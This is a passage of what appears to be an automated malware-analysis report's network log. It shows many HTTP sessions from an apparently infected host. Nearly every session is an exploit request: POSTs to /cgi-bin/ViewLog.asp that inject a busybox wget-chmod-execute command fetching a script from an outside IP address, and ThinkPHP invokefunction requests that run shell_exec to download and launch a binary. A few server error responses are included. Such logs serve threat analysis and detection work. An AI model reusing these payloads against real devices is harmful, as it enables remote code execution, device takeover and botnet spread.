                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.689028978 CET8030OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:06.668772936 CET8208OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:10.668246031 CET8736OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:18.603312016 CET9702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.473138094 CET11648OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.237065077 CET15797OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              356192.168.2.233719494.121.101.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.691298008 CET7883OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              357192.168.2.234327685.207.247.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.691766977 CET7883OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.133112907 CET7942OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              358192.168.2.235393031.200.55.1008080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.692936897 CET7884OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              359192.168.2.234575431.200.59.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.701406002 CET7885OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              36192.168.2.233569495.223.93.23880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:13.727112055 CET1775OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:14.056776047 CET1871INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              360192.168.2.234107295.86.75.118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.710711002 CET7886OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              361192.168.2.235391895.101.67.10180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.784710884 CET7897OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:04.086364985 CET7931INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:03 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:03 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 65 36 36 35 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 33 26 23 34 36 3b 34 34 62 36 66 64 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a5e6655f&#46;1699910343&#46;44b6fdb</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              362192.168.2.235589895.93.219.10280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.794310093 CET7898OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              363192.168.2.235550885.10.80.448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.845607996 CET7899OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.955692053 CET8058INHTTP/1.1 404 Not Found
                                                              Server: PsiOcppApp
                                                              Connection: keep-alive
                                                              Date:Mon, 13 Nov 2023 18:39:20 GMT
                                                              Content-Length: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              364192.168.2.234828495.56.83.9380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:03.845875978 CET7899OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:04.217577934 CET7945INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:19:04.218060017 CET7945INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              365192.168.2.235547095.86.77.698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.019954920 CET7927OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              36685.17.204.998080192.168.2.2335664
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.261434078 CET7946INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              367192.168.2.235128485.14.227.1428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.321268082 CET7948OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.622330904 CET7957INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 345
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Server: lighttpd/1.4.45
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              368192.168.2.234791631.136.139.2368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.348684072 CET7949OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.356931925 CET8080OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:07.340763092 CET8328OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.436176062 CET8854OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:19.371109009 CET9810OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:35.241045952 CET11761OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.236824989 CET15796OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
